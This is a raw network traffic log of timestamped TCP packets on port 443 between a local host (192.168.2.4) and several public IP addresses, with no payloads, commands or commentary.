Oct 2, 2024 00:19:08.376024008 CEST	443	49739	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:08.376151085 CEST	49739	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:08.377043962 CEST	49739	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:08.377053976 CEST	443	49739	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:08.389921904 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:08.389956951 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:08.390029907 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:08.390199900 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:08.390212059 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:08.503374100 CEST	49742	443	192.168.2.4	192.0.78.26
Oct 2, 2024 00:19:08.503422022 CEST	443	49742	192.0.78.26	192.168.2.4
Oct 2, 2024 00:19:08.503489017 CEST	49742	443	192.168.2.4	192.0.78.26
Oct 2, 2024 00:19:08.503597975 CEST	49743	443	192.168.2.4	192.0.78.26
Oct 2, 2024 00:19:08.503643990 CEST	443	49743	192.0.78.26	192.168.2.4
Oct 2, 2024 00:19:08.503750086 CEST	49743	443	192.168.2.4	192.0.78.26
Oct 2, 2024 00:19:08.503828049 CEST	49742	443	192.168.2.4	192.0.78.26
Oct 2, 2024 00:19:08.503843069 CEST	443	49742	192.0.78.26	192.168.2.4
Oct 2, 2024 00:19:08.503998995 CEST	49743	443	192.168.2.4	192.0.78.26
Oct 2, 2024 00:19:08.504017115 CEST	443	49743	192.0.78.26	192.168.2.4
Oct 2, 2024 00:19:08.845910072 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:08.846165895 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:08.846183062 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:08.847255945 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:08.847343922 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:08.849946022 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:08.850020885 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:08.850138903 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:08.850148916 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:08.892263889 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:08.971172094 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:08.971240997 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:08.971276045 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:08.971292019 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:08.971309900 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:08.971353054 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:08.971353054 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:08.971371889 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:08.971416950 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:08.971577883 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:08.971740961 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:08.971786022 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:08.971795082 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:08.972074986 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:08.972121000 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:08.972130060 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:08.973321915 CEST	443	49743	192.0.78.26	192.168.2.4
Oct 2, 2024 00:19:08.973640919 CEST	49743	443	192.168.2.4	192.0.78.26
Oct 2, 2024 00:19:08.973663092 CEST	443	49743	192.0.78.26	192.168.2.4
Oct 2, 2024 00:19:08.974067926 CEST	443	49743	192.0.78.26	192.168.2.4
Oct 2, 2024 00:19:08.974208117 CEST	49743	443	192.168.2.4	192.0.78.26
Oct 2, 2024 00:19:08.974781990 CEST	443	49743	192.0.78.26	192.168.2.4
Oct 2, 2024 00:19:08.974874020 CEST	49743	443	192.168.2.4	192.0.78.26
Oct 2, 2024 00:19:08.975815058 CEST	49743	443	192.168.2.4	192.0.78.26
Oct 2, 2024 00:19:08.975905895 CEST	443	49743	192.0.78.26	192.168.2.4
Oct 2, 2024 00:19:08.975914001 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:08.975928068 CEST	49743	443	192.168.2.4	192.0.78.26
Oct 2, 2024 00:19:08.975969076 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:08.975979090 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:08.983202934 CEST	443	49742	192.0.78.26	192.168.2.4
Oct 2, 2024 00:19:08.983416080 CEST	49742	443	192.168.2.4	192.0.78.26
Oct 2, 2024 00:19:08.983436108 CEST	443	49742	192.0.78.26	192.168.2.4
Oct 2, 2024 00:19:08.983803988 CEST	443	49742	192.0.78.26	192.168.2.4
Oct 2, 2024 00:19:08.983864069 CEST	49742	443	192.168.2.4	192.0.78.26
Oct 2, 2024 00:19:08.984539032 CEST	443	49742	192.0.78.26	192.168.2.4
Oct 2, 2024 00:19:08.984582901 CEST	49742	443	192.168.2.4	192.0.78.26
Oct 2, 2024 00:19:08.984704018 CEST	49742	443	192.168.2.4	192.0.78.26
Oct 2, 2024 00:19:08.984771013 CEST	443	49742	192.0.78.26	192.168.2.4
Oct 2, 2024 00:19:09.019260883 CEST	49743	443	192.168.2.4	192.0.78.26
Oct 2, 2024 00:19:09.019283056 CEST	443	49743	192.0.78.26	192.168.2.4
Oct 2, 2024 00:19:09.057969093 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:09.058010101 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:09.058044910 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:09.058062077 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:09.058104038 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:09.058149099 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:09.058383942 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:09.058429956 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:09.058437109 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:09.058696985 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:09.058739901 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:09.058747053 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:09.058896065 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:09.058928013 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:09.058938980 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:09.058945894 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:09.058983088 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:09.059478045 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:09.059546947 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:09.059592009 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:09.059598923 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:09.059894085 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:09.059926033 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:09.059941053 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:09.059947968 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:09.059986115 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:09.060702085 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:09.060817957 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:09.060863972 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:09.060870886 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:09.061012983 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:09.061044931 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:09.061053991 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:09.061060905 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:09.061103106 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:09.061110973 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:09.061182976 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:09.061224937 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:09.061382055 CEST	49741	443	192.168.2.4	104.17.25.14
Oct 2, 2024 00:19:09.061393976 CEST	443	49741	104.17.25.14	192.168.2.4
Oct 2, 2024 00:19:09.065628052 CEST	49743	443	192.168.2.4	192.0.78.26
Oct 2, 2024 00:19:09.080800056 CEST	49742	443	192.168.2.4	192.0.78.26
Oct 2, 2024 00:19:09.080830097 CEST	443	49742	192.0.78.26	192.168.2.4
Oct 2, 2024 00:19:09.109330893 CEST	443	49743	192.0.78.26	192.168.2.4
Oct 2, 2024 00:19:09.109411001 CEST	443	49743	192.0.78.26	192.168.2.4
Oct 2, 2024 00:19:09.109488010 CEST	49743	443	192.168.2.4	192.0.78.26
Oct 2, 2024 00:19:09.110287905 CEST	49743	443	192.168.2.4	192.0.78.26
Oct 2, 2024 00:19:09.110301971 CEST	443	49743	192.0.78.26	192.168.2.4
Oct 2, 2024 00:19:09.190387011 CEST	49742	443	192.168.2.4	192.0.78.26
Oct 2, 2024 00:19:09.205809116 CEST	49744	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:09.205848932 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:09.206027985 CEST	49744	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:09.206274033 CEST	49745	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:09.206321001 CEST	443	49745	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:09.206389904 CEST	49745	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:09.206487894 CEST	49744	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:09.206500053 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:09.206739902 CEST	49745	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:09.206752062 CEST	443	49745	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:09.667299032 CEST	443	49745	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:09.667552948 CEST	49745	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:09.667579889 CEST	443	49745	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:09.668637991 CEST	443	49745	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:09.668693066 CEST	49745	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:09.669735909 CEST	49745	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:09.669799089 CEST	443	49745	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:09.669918060 CEST	49745	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:09.669924974 CEST	443	49745	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:09.691061020 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:09.691405058 CEST	49744	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:09.691421986 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:09.692507029 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:09.692564964 CEST	49744	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:09.693144083 CEST	49744	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:09.693211079 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:09.714238882 CEST	49745	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:09.745518923 CEST	49744	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:09.745533943 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:09.797698021 CEST	49744	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:09.978763103 CEST	443	49745	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:09.978806973 CEST	443	49745	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:09.978831053 CEST	443	49745	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:09.978846073 CEST	49745	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:09.978854895 CEST	443	49745	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:09.978867054 CEST	443	49745	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:09.978899956 CEST	49745	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:09.978912115 CEST	443	49745	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:09.978943110 CEST	443	49745	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:09.978957891 CEST	49745	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:09.978986979 CEST	49745	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:09.980561972 CEST	49745	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:09.980576992 CEST	443	49745	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.054475069 CEST	49744	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:10.099407911 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.155025005 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.155097008 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.155133963 CEST	49744	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:10.155141115 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.155173063 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.155213118 CEST	49744	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:10.155220032 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.155395985 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.155431986 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.155436039 CEST	49744	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:10.155442953 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.155486107 CEST	49744	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:10.155565023 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.159742117 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.159785986 CEST	49744	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:10.159809113 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.159846067 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.159878969 CEST	49744	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:10.159885883 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.206938982 CEST	49744	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:10.245637894 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.245785952 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.245816946 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.245842934 CEST	49744	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:10.245860100 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.245898962 CEST	49744	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:10.245908976 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.246097088 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.246149063 CEST	49744	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:10.312685013 CEST	49744	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:10.312716007 CEST	443	49744	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.499396086 CEST	49747	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:10.499452114 CEST	443	49747	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.499521971 CEST	49747	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:10.499995947 CEST	49747	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:10.500011921 CEST	443	49747	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.979974031 CEST	443	49747	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.980376005 CEST	49747	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:10.980405092 CEST	443	49747	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.980741978 CEST	443	49747	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.981055975 CEST	49747	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:10.981118917 CEST	443	49747	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:10.981215954 CEST	49747	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.023408890 CEST	443	49747	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.077168941 CEST	49748	443	192.168.2.4	142.250.184.196
Oct 2, 2024 00:19:11.077222109 CEST	443	49748	142.250.184.196	192.168.2.4
Oct 2, 2024 00:19:11.077409983 CEST	49748	443	192.168.2.4	142.250.184.196
Oct 2, 2024 00:19:11.077748060 CEST	49748	443	192.168.2.4	142.250.184.196
Oct 2, 2024 00:19:11.077764034 CEST	443	49748	142.250.184.196	192.168.2.4
Oct 2, 2024 00:19:11.108383894 CEST	443	49747	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.108459949 CEST	443	49747	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.108520985 CEST	49747	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.109236956 CEST	49747	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.109258890 CEST	443	49747	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.118479967 CEST	49749	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.118527889 CEST	443	49749	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.118649006 CEST	49749	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.118962049 CEST	49749	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.118976116 CEST	443	49749	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.158363104 CEST	49750	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.158411026 CEST	443	49750	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.158562899 CEST	49750	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.158931971 CEST	49750	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.158941984 CEST	443	49750	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.446856976 CEST	49751	443	192.168.2.4	184.28.90.27
Oct 2, 2024 00:19:11.446888924 CEST	443	49751	184.28.90.27	192.168.2.4
Oct 2, 2024 00:19:11.446964025 CEST	49751	443	192.168.2.4	184.28.90.27
Oct 2, 2024 00:19:11.449244976 CEST	49751	443	192.168.2.4	184.28.90.27
Oct 2, 2024 00:19:11.449263096 CEST	443	49751	184.28.90.27	192.168.2.4
Oct 2, 2024 00:19:11.582784891 CEST	443	49749	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.583146095 CEST	49749	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.583162069 CEST	443	49749	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.583511114 CEST	443	49749	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.584127903 CEST	49749	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.584204912 CEST	443	49749	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.584291935 CEST	49749	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.628351927 CEST	49749	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.628365993 CEST	443	49749	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.649974108 CEST	443	49750	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.651479959 CEST	49750	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.651489973 CEST	443	49750	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.652518988 CEST	443	49750	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.652578115 CEST	49750	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.653549910 CEST	49750	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.653578043 CEST	49750	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.653611898 CEST	443	49750	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.653671980 CEST	49750	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.653688908 CEST	443	49750	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.653701067 CEST	49750	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.653995991 CEST	49752	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.654011965 CEST	49750	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.654036045 CEST	443	49752	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.654089928 CEST	49752	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.654282093 CEST	49752	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.654297113 CEST	443	49752	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.727633953 CEST	443	49749	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.727694035 CEST	443	49749	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.727740049 CEST	443	49749	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.727768898 CEST	443	49749	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.727771997 CEST	49749	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.727782965 CEST	443	49749	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.727826118 CEST	49749	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.727832079 CEST	443	49749	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.727868080 CEST	443	49749	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.727871895 CEST	49749	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.727925062 CEST	49749	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.733828068 CEST	49749	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.733841896 CEST	443	49749	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.734067917 CEST	443	49748	142.250.184.196	192.168.2.4
Oct 2, 2024 00:19:11.734375000 CEST	49748	443	192.168.2.4	142.250.184.196
Oct 2, 2024 00:19:11.734391928 CEST	443	49748	142.250.184.196	192.168.2.4
Oct 2, 2024 00:19:11.735492945 CEST	443	49748	142.250.184.196	192.168.2.4
Oct 2, 2024 00:19:11.735583067 CEST	49748	443	192.168.2.4	142.250.184.196
Oct 2, 2024 00:19:11.736598015 CEST	49748	443	192.168.2.4	142.250.184.196
Oct 2, 2024 00:19:11.736668110 CEST	443	49748	142.250.184.196	192.168.2.4
Oct 2, 2024 00:19:11.740150928 CEST	49753	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.740202904 CEST	443	49753	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.740272999 CEST	49753	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.740530968 CEST	49753	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:11.740549088 CEST	443	49753	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:11.782056093 CEST	49748	443	192.168.2.4	142.250.184.196
Oct 2, 2024 00:19:11.782088041 CEST	443	49748	142.250.184.196	192.168.2.4
Oct 2, 2024 00:19:11.828922987 CEST	49748	443	192.168.2.4	142.250.184.196
Oct 2, 2024 00:19:12.108026028 CEST	443	49751	184.28.90.27	192.168.2.4
Oct 2, 2024 00:19:12.108109951 CEST	49751	443	192.168.2.4	184.28.90.27
Oct 2, 2024 00:19:12.111680984 CEST	49751	443	192.168.2.4	184.28.90.27
Oct 2, 2024 00:19:12.111694098 CEST	443	49751	184.28.90.27	192.168.2.4
Oct 2, 2024 00:19:12.111987114 CEST	443	49751	184.28.90.27	192.168.2.4
Oct 2, 2024 00:19:12.142751932 CEST	443	49752	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:12.144252062 CEST	49752	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:12.144275904 CEST	443	49752	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:12.145320892 CEST	443	49752	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:12.145386934 CEST	49752	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:12.145745039 CEST	49752	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:12.145807028 CEST	443	49752	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:12.145972967 CEST	49752	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:12.157059908 CEST	49751	443	192.168.2.4	184.28.90.27
Oct 2, 2024 00:19:12.162338972 CEST	49751	443	192.168.2.4	184.28.90.27
Oct 2, 2024 00:19:12.188302040 CEST	49752	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:12.188323975 CEST	443	49752	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:12.207405090 CEST	443	49751	184.28.90.27	192.168.2.4
Oct 2, 2024 00:19:12.225709915 CEST	443	49753	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:12.226136923 CEST	49753	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:12.226157904 CEST	443	49753	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:12.227277040 CEST	443	49753	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:12.227349043 CEST	49753	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:12.227657080 CEST	49753	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:12.227665901 CEST	49753	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:12.227730989 CEST	443	49753	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:12.227773905 CEST	49753	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:12.227788925 CEST	49753	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:12.228092909 CEST	49754	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:12.228130102 CEST	443	49754	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:12.228195906 CEST	49754	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:12.228394985 CEST	49754	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:12.228404999 CEST	443	49754	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:12.235162020 CEST	49752	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:12.266062021 CEST	443	49752	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:12.266134024 CEST	443	49752	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:12.266196966 CEST	49752	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:12.268322945 CEST	49752	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:12.268338919 CEST	443	49752	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:12.380948067 CEST	443	49751	184.28.90.27	192.168.2.4
Oct 2, 2024 00:19:12.381026030 CEST	443	49751	184.28.90.27	192.168.2.4
Oct 2, 2024 00:19:12.381082058 CEST	49751	443	192.168.2.4	184.28.90.27
Oct 2, 2024 00:19:12.381279945 CEST	49751	443	192.168.2.4	184.28.90.27
Oct 2, 2024 00:19:12.381295919 CEST	443	49751	184.28.90.27	192.168.2.4
Oct 2, 2024 00:19:12.442848921 CEST	49755	443	192.168.2.4	184.28.90.27
Oct 2, 2024 00:19:12.442899942 CEST	443	49755	184.28.90.27	192.168.2.4
Oct 2, 2024 00:19:12.442981958 CEST	49755	443	192.168.2.4	184.28.90.27
